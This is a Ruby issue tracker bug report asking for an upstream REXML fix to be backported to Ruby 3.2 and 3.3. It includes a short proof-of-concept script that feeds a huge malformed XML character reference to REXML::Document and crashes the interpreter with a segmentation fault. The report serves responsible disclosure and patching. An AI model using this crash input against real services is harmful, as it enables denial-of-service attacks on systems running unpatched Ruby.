Bug #21344: Segment Fault Caused by no Backported Patches - Ruby - Ruby Issue Tracking System

Actions

Copy link

Bug #21344

closed

Segment Fault Caused by no Backported Patches

Added by tianstcht (Haotian Cheng) 3 months ago. Updated 3 months ago.

Status:

Closed

Assignee:

Target version:

ruby -v:

3.2.3 (2024-01-18 revision 52bb2ac0a6) [x86_64-linux-gnu]

Backport:

3.2: REQUIRED, 3.3: DONE, 3.4: DONTNEED

[ruby-core:122136]

Description

In my local machine(3.2.3 (2024-01-18 revision 52bb2ac0a6) [x86_64-linux-gnu]), which is the default version in ubuntu2404, a segmentation fault can be stably triggered by the poc including malicious xml data.

The poc here:

require "rexml/document"
puts REXML::VERSION

def poc1(size)
    input = <<EOF
     <mydoc>
        <tt>#{'&' + '1'*size + '#x2F3F' + ' '}</tt>
    </mydoc>
EOF

    parser = REXML::Document.new input
end

poc1(8_999_999)

The issue has been fixed in this commit:
https://github.com/ruby/ruby/commit/b959263b58e26ef630c085f9f7ddc04373a998c7

But the fix haven't been backported to Ruby 3.2 and 3.3.

Based on the developer's response, I think the backporting may be needed so the issue built.

Actions

Copy link

Also available in: Atom PDF

Like0

Like0Like0Like0Like0

Project

General

Profile

Ruby

Tags

Custom queries

Bug #21344

Segment Fault Caused by no Backported Patches

Updated by nobu (Nobuyoshi Nakada) 3 months ago

Updated by nagachika (Tomoyuki Chikanaga) 3 months ago

Updated by nagachika (Tomoyuki Chikanaga) 3 months ago

Updated by nagachika (Tomoyuki Chikanaga) 3 months ago